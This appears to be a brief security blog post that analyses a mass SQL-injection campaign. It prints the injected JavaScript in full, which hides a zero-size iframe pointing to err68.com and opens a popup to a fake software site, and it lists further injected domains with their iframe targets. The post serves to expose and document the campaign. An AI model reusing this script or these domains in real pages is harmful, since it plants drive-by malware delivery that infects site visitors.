new sql injected domains

http://www.encode72.com/b.js

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://err68.com/cgi-bin/index.cgi?ad width=0 height
=0 frameborder=0></iframe>");
window.open("http://topsoftwaresale.com",'soft',"toolbar=no,location=no,director
ies=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1015,height=600,top
=10,left=10");
}
catch(e)
{
};
}

As can be seen from the content it opens a website topsoftwaresale.com. but embedded is an iframe from err68.com/cgi-bin/index.cgi?ad
The content of the iframe how to decode it can be seen here.

Similar to the injected domain above, the others are as follows:
http://www.tag58.com/b.js -> encode72.com/cgi-bin/index.cgi?ad
http://www.win496.com/b.js -> exec51.com/cgi-bin/index.cgi?ad
http://www.exe94.com/b.js -> err68.com/cgi-bin/index.cgi?ad
http://www.view89.com/b.js -> err68.com/cgi-bin/index.cgi?ad
http://www.rundll841.com/b.js -> win496.com/cgi-bin/index.cgi?ad
err68.com/b.js -> win496.com/cgi-bin/index.cgi?ad
exec51.com/b.js -> err68.com/cgi-bin/index.cgi?ad

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: